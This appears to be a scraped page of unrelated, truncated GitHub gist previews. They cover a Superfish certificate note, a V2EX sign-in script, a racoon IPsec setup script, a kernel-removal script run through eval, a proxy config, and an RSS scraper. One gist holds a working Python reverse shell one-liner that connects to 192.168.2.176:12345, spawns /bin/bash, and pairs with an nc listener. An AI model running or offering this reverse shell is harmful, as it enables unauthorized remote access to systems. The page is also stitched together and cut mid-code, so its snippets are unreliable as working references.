superfish.pem
contains:
- the Superfish certificate as found by both Chris Palmer and Matt Burke;
- the encrypted private key as found by Karl Koscher.
$ openssl x509 -in superfish.pem -text
Certificate:
Data:
Version: 3 (0x2)
superfish.pem
contains:
$ openssl x509 -in superfish.pem -text
Certificate:
Data:
Version: 3 (0x2)
# -*- coding: utf-8 -*- | |
from bs4 import BeautifulSoup | |
import requests | |
username = '' ###账号### | |
password = '' ###密码### | |
login_url = 'http://v2ex.com/signin' ###如V2EX设置了使用 SSL,必须改 https### | |
index_url = 'http://v2ex.com' ###同上### | |
mission_url = 'http://www.v2ex.com/mission/daily' ###同上### | |
UA = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) \ |
#! /bin/sh | |
# 安装racoon | |
apt-get install racoon | |
# 配置racoon | |
cat << _EOF_ > /etc/racoon/racoon.conf | |
log notify; | |
path pre_shared_key "/etc/racoon/psk.txt"; | |
path certificate "/etc/racoon/certs"; | |
listen { |
#!/bin/bash | |
str=`ls /boot/ | grep initrd.img|cut -c 12-` | |
arr=(${str// / }) | |
cmd="apt-get remove " | |
for i in ${arr[@]} | |
do | |
echo "Found Linux: "$i | |
cmd=${cmd}"linux-image-"${i}" " | |
done | |
eval $cmd |
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
# on the CLIENT, run the following: | |
# nc -l 12345 | |
# on the SERVER, start the "reverse shell" | |
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345 | |
# now go to the CLIENT, listen on port 12345 for incoming shell connections | |
nc -l 12345 |
[Proxy] | |
WIFI = direct, interface=en2 | |
VPN = direct, interface=utun0 | |
[Rule] | |
DOMAIN-SUFFIX,yach.me,WIFI | |
FINAL,VPN |
# -*- coding: utf-8 -*- | |
import requests | |
import re | |
import time | |
def get_xml(): | |
try: | |
global l | |
doc = requests.get("http://bbsrss.mirrors.cqupt.edu.cn/bbs/forum.php?mod=rss&fid=68&auth=0").text | |
l = [[x, y] for x, y in zip(re.findall(re.compile(r'<title>(.*?)</title>'), doc)[2:], |